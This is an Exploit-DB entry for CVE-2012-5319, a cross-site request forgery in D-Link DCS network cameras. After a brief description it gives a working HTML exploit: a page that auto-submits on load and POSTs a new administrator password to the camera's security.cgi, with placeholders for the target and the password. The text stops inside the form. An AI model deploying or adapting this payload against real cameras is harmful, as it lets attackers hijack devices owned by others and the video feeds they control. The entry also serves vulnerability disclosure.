Dlink DCS series CSRF Change Admin Password

EDB-ID: 18509 CVE: 2012-5319 OSVDB-ID: 79770
Verified: Author: rigan Published: 2012-02-22
Download Exploit: Source Raw Download Vulnerable App: N/A
Title:   Dlink DCS series CSRF Change Admin Password 
Version: DCS-900, DCS-2000, DCS-5300 and possibly other.
Date:    2012-02-22
Author:  rigan - imrigan [sobachka] gmail.com
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. 
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://your_target/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>